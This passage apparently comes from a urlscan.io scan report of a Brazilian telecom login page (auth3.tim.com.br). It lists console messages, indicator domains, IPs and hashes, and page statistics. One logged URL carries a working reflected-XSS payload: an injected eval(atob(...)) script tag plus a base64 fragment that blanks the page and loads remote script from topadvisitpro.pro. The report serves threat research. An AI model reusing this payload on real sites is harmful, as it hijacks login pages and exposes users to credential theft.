Up5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
network	error	URL: https://tim.jokeridea.com/vr/StyleSheet.css Message: Failed to load resource: the server responded with a status of 404 (Not Found)
network	error	URL: https://tim.jokeridea.com/vr/Tim.png Message: Failed to load resource: the server responded with a status of 404 (Not Found)

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

analytics-br-tim.securewebfraud.io
analytics.google.com
auth3.tim.com.br
stats.g.doubleclick.net
tim.jokeridea.com
topadvisitpro.pro
wap.dindo.com.br
www.google-analytics.com
www.google.com
www.googletagmanager.com
www.timpromos.com.br
wap.dindo.com.br
www.google.com
2001:4860:4802:36::181
2607:f8b0:4004:c06::8b
2607:f8b0:4004:c08::68
2607:f8b0:4004:c09::9b
2607:f8b0:4004:c17::61
3.212.81.97
45.60.63.22
45.90.56.13
91.220.208.18
91.241.94.8
1cffc2b3146584685cd72751d7f28aa030ab9ae2f1bc78f2c27909f8d8287b26
31c3e5353a15096bdcdbc50ed832a1d2e0413e06ac73f7eadca7b98942a91f1e
38b82be8dc970bd32e5651b51b46d5c5bdd81a1766c035bbe022f1d00ac09fce
3c950db6b1d1888ee9e00411adc4c63735731a4ee2b3db9d2f7fc44f26cefbf9
3e75a6774ef7041083d556b2f83a816acdd398eff6add8c1867c0cea9ddf6d4b
443b1c92b35ad6aa85dad25c602e8b4ccaeb38f7a5e048305e14cbeb2d57a571
6068f86ff5e6d3a3e100e95fd0ab03a5fb9ebfca9386b2c0ee131361a62526c2
646de1820a3f0a81b2aa7ea26de561e5cbab36ef8430d7bb7b7f0ab024569b40
668b046d12db350ccba6728890476b3efee53b2f42dbb84743e5e9f1ae0cc404
71928367deed25916c0de98665f5733b47e07ae048a79a0901a48fabb9876040
7455bacb03f7ef04d79010638db14d8434cf7a349914c2ee99eb5d4220338675
789beef363d46fed28af585825aaf01d6a83bbcacdc892b4fbd1719015f47a41
950070a58deedd49cfa5164e99c1b72ebf6b239f86dab6ea9bab8d7d86fc6068
c28f024df8df9c3553efca35b134d3bde558f9e5f85a3b052d581bef81c47c90
d79fb817a65fae18240ebc403be03abef91d8e7e32eb120f7e011817732199e0
d8151845717c3ed76a8002136f43423e7efedc096b4f60eb7aefe62c65544eef
dc1d54dab6ec8c00f70137927504e4f222c8395f10760b6beecfcfa94e08249f
dc8505bc6acac0f02f10fbc0b55dfebed50dd5f51cb7c5b058ad0206ebe44f3e
de36e50194320a7d3ef1ace9bd34a875a8bd458b253c061979dd628e9bf49afd
e0ef803f8bb9cbe07f2407212c2422f87d48dbd08addb5bb994c5f485b2dcc6a
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
ee3c20e7ded1bd431ba00fb44c42a664de16c4052aeb9e5556ef74e29b6fcd7d
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
f05e67abbb4c8036ae631ee4fc5a99428d5bad75fd8996dfb01c09ec6ade3a1b

auth3.tim.com.br Open in urlscan Pro 45.60.63.22 Public Scan

Summary

urlscan.io Verdict: No classification

Domain & IP information

Screenshot Live screenshot Full Image

Page URL History Show full URLs

Detected technologies

Page Statistics

33 Requests

76 %HTTPS

50 %IPv6

10 Domains

11 Subdomains

11 IPs

3 Countries

424 kBTransfer

1239 kBSize

11 Cookies

0 Outgoing links

Page URL History

Redirected requests

33 HTTP transactions Everything HTML Script AJAX CSS Image Expand all 0 data transactions

Request headers

Response headers

Redirect headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

auth3.tim.com.br Open in urlscan Pro
45.60.63.22 Public Scan

Screenshot
Live screenshot

Full Image

33
Requests

76 %
HTTPS

50 %
IPv6

10
Domains

11
Subdomains

11
IPs

3
Countries

424 kB
Transfer

1239 kB
Size

11
Cookies

33 HTTP transactions
0 data transactions